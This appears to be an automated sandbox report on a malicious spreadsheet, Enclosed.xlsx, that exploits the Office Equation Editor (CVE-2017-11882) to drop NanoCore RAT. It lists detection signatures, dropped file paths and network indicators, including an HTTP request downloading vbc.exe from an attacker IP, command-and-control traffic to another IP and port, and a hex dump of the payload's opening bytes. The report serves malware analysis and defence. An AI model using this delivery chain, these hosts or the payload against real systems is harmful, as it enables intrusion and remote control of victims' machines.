Windows Analysis Report Enclosed.xlsx

Overview

General Information

Sample Name:	Enclosed.xlsx
Analysis ID:	483371
MD5:	307b2db43e9e3b04e429cdd9d7df08ad
SHA1:	58a8d2e79a4984c457f779c34e6a3147a2a66d3f
SHA256:	d902487a332eb4be203d196abe75aa72b2fed223df29fb3112aa27e5b54109df
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Yara detected AntiVM3

Detected Nanocore Rat

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Multi AV Scanner detection for dropped file

Yara detected Nanocore RAT

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Machine Learning detection for dropped file

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Stores large binary data to the registry

Contains functionality to launch a process as a different user

Stores files to the Windows start menu directory

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Office Equation Editor has been started

Binary contains a suspicious time stamp

Creates a start menu entry (Start Menu\Programs\Startup)

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: Enclosed.xlsx

ReversingLabs: Detection: 29%

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\sys30s.exe

Metadefender: Detection: 13%

Perma Link

Yara detected Nanocore RAT

Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 9.2.sys30.exe.560000.3.unpack	Avira: Label: TR/NanoCore.fadte
Source: 9.2.sys30.exe.70000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49170 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.google.com

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	6_2_0038DB3F
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	6_2_0038BC70
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 00384610h	6_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then mov dword ptr [ebp-40h], 00000001h	7_2_0038D750
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	7_2_0038BC70
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then jmp 00384610h	7_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then jmp 00C29F46h	7_2_00C29E08
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then jmp 00C2B4CCh	7_2_00C2B338
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then jmp 00C29F46h	7_2_00C29DF9
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then jmp 00C2B4CCh	7_2_00C2B328
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	9_2_0062F300
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	9_2_0062F2FD
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_00629A02
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001D0797h	11_2_001D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001D0797h	11_2_001D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001C0797h	12_2_001C0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001C0797h	12_2_001C0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00330797h	13_2_00330560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00330797h	13_2_00330550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001F0797h	14_2_001F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001F0797h	14_2_001F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00210797h	15_2_00210560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00210797h	15_2_00210550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 003A0797h	16_2_003A0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 003A0797h	16_2_003A0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002E0797h	17_2_002E0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002E0797h	17_2_002E0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001E0797h	18_2_001E0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001E0797h	18_2_001E0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001D0797h	19_2_001D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001D0797h	19_2_001D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00690797h	20_2_00690560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00690797h	20_2_00690550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00450797h	21_2_00450560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00450797h	21_2_00450550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00250797h	22_2_00250560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00250797h	22_2_00250550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 003F0797h	23_2_003F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 003F0797h	23_2_003F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00190797h	24_2_00190560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00190797h	24_2_00190550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002F0797h	25_2_002F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002F0797h	25_2_002F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002D0797h	26_2_002D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002D0797h	26_2_002D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00280797h	27_2_00280560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00280797h	27_2_00280550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00320797h	28_2_00320560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00320797h	28_2_00320550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002C0797h	29_2_002C0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002C0797h	29_2_002C0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00220797h	30_2_00220560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00220797h	30_2_00220550

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 13.238.159.178:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 172.217.168.36:443

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49181 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49182 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49183 -> 194.5.98.103:5230

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 19:48:11 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9Last-Modified: Tue, 14 Sep 2021 18:45:13 GMTETag: "a2e00-5cbf8fb685aa3"Accept-Ranges: bytesContent-Length: 667136Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 60 7f 18 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 24 0a 00 00 08 00 00 00 00 00 00 ce 43 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 43 0a 00 4b 00 00 00 00 60 0a 00 04 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 23 0a 00 00 20 00 00 00 24 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 04 04 00 00 00 60 0a 00 00 06 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0a 00 00 02 00 00 00 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 43 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 9c ec 08 00 e4 56 01 00 03 00 02 00 47 00 00 06 b8 79 01 00 e0 6b 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 20 9c 01 00 00 8d 01 00 00 01 25 d0 64 01 00 04 28 01 00 00 0a 80 65 01 00 04 20 94 00 00 00 8d 05 00 00 01 25 d0 66 01 00 04 28 01 00 00 0a 80 67 01 00 04 2a 1e 02 28 02 00 00 0a 2a 26 00 02 28 05 00 00 0a 00 2a ce 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 73 0a 00 00 0a 80 05 00 00 04 2a 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 0e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 0f 00 00 0a 0a 2b 00 06 2a 1b 30 05 00 ff 00 00 00 06 00 00 11 00 02 8c 06 00 00 1b 2c 0f 0f 00 fe 16 06 00 00 1b 6f 14 00

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49170 version: TLS 1.0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /truth/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.238.159.178Connection: Keep-Alive

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49172 -> 194.5.98.103:5230

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178

Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000006.00000002.519010155.00000000005A1000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685487329.000000000061D000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: sys30.exe, 00000008.00000002.524078956.0000000002ACA000.00000004.00000001.sdmp	String found in binary or memory: http://dual-a-0001.dc-msedge.net
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp	String found in binary or memory: http://n.f
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.520252057.000000000518C000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/s
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobede
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ao
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
